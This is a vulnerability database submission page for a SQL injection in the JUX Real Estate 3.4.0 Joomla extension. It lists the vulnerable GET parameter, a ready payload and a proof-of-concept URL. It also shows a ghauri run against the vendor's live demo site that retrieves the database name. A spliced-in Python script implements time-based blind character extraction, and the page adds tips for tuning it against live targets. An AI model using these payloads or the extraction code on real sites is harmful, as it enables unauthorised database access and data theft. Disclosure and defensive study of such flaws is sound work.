Submit #509884: JoomlaUX JUX Real Estate 3.4.0 SQL Injection

Title: JoomlaUX JUX Real Estate 3.4.0 SQL Injection
Description:
# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: skalvin
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707

## Description
SQL injection can allow unauthorized access to sensitive data, modification of data, and crashing the application or making it unavailable, leading to lost revenue and damage to a company's reputation.

Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties
GET parameter 'title' is vulnerable to SQL injection.

---
Parameter: title (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search
---

## POC:
https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]

## Payload:
1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z

## Live POC:
ghauri -u "https://demo.joomlaux.com/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search" --batch --tech=t --current-db
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] fetching current database
[INFO] retrieving the length of query output
[INFO] retrieved: 19
[INFO] retrieved: 'joomlaux_realestate'
current database: 'joomlaux_realestate'
[-] Done
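The ghauri run above infers the database name one character at a time from response delays and never sees the data in a reply. The following is an added example, not the submitter's code and not JUX Real Estate's source (which this page does not show): it reproduces that time-based blind extraction offline against a constructed in-memory SQLite database with a MySQL-style SLEEP() registered on it. The string concatenation in search_vulnerable() is an assumed pattern chosen to behave as the advisory reports, the table names and rows are constructed, and because SQLite has no XOR operator the oracle uses a CASE expression rather than the page's XOR form. search_fixed() is the bound-parameter version beside it, fed the same payload.

```python
import sqlite3
import time

# Everything below is a constructed stand-in: an in-memory SQLite database with a
# MySQL-style SLEEP() registered, so the advisory's time-based blind technique can be
# run offline. JUX Real Estate's real query is not on this page; the concatenation in
# search_vulnerable() is an ASSUMED pattern that reproduces the reported behaviour.
SLEEP_SECONDS = 0.03

# The advisory's MySQL payload, for reference only. SQLite has no XOR operator and no
# SLEEP(), so the oracle below uses a CASE expression with a registered SLEEP instead.
MYSQL_PAYLOAD = "1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z"


def build_db():
    """Constructed sample schema (not the extension's real tables)."""
    conn = sqlite3.connect(":memory:")
    # Stand-in for MySQL's SLEEP(): block for the given seconds, return 0.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript("""
        CREATE TABLE realties (id INTEGER PRIMARY KEY, title TEXT, price INTEGER);
        INSERT INTO realties (title, price) VALUES ('Sea view villa', 400000),
                                                   ('Downtown loft', 63752);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users (username, password) VALUES ('admin', 'hash-placeholder');
    """)
    return conn


def search_vulnerable(conn, title):
    """ASSUMED vulnerable pattern: the GET parameter is spliced into the LIKE clause."""
    sql = "SELECT id, title FROM realties WHERE title LIKE '%" + title + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, title):
    """Hardened form: the whole value travels as a bound parameter, never as SQL."""
    sql = "SELECT id, title FROM realties WHERE title LIKE ?"
    return conn.execute(sql, ("%" + title + "%",)).fetchall()


def time_oracle(conn, condition):
    """True if CONDITION holds, judged purely by response time (no data in the reply)."""
    payload = (f"%' AND (CASE WHEN ({condition}) THEN SLEEP({SLEEP_SECONDS}) "
               f"ELSE 0 END)=0 AND '1%'='1")
    start = time.perf_counter()
    search_vulnerable(conn, payload)
    return time.perf_counter() - start >= SLEEP_SECONDS * 0.9


def extract_int(conn, expr, lo, hi):
    """Binary-search the integer value of EXPR in [lo, hi]; one oracle call per halving."""
    while lo < hi:
        mid = (lo + hi) // 2
        if time_oracle(conn, f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string(conn, expr, max_len=64):
    """Length first, then one printable ASCII character at a time, as the tool output shows."""
    length = extract_int(conn, f"length({expr})", 0, max_len)
    return "".join(
        chr(extract_int(conn, f"unicode(substr({expr}, {i}, 1))", 32, 126))
        for i in range(1, length + 1)
    )


def demo():
    conn = build_db()
    # On MySQL the equivalent target would be database(); SQLite has no such function,
    # so pull the first table name from the catalogue instead.
    first_table = extract_string(
        conn, "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)")
    # The same shape of payload against the parameterised query is just a search string:
    # no rows match it and nothing sleeps.
    payload = f"%' AND (CASE WHEN (1=1) THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END)=0 AND '1%'='1"
    start = time.perf_counter()
    rows = search_fixed(conn, payload)
    fixed_delayed = time.perf_counter() - start >= SLEEP_SECONDS * 0.9
    return first_table, rows, fixed_delayed


if __name__ == "__main__":
    print(demo())
```

Against a live target the single-sample threshold used here is too optimistic: network jitter can exceed a short delay, so confirm with a baseline of several requests and a SLEEP value well above the observed variance (the advisory's 6 seconds is a sensible choice). Note also that each true oracle answer costs one sleep per row the WHERE clause touches, which is why time-based extraction is slow and why the submitter's tool first retrieves the length (19) before spending queries on characters.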
Source: https://demo.joomlaux.com/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=1
User: skalvin (UID 49463)
Submission: 02/26/2025 22:29
Moderation: 03/08/2025 15:58 (10 days later)
Status: Accepted
VulDB entry: 299039 [JoomlaUX JUX Real Estate 3.4.0 on Joomla GET Parameter realties Title sql injection]
Points: 20
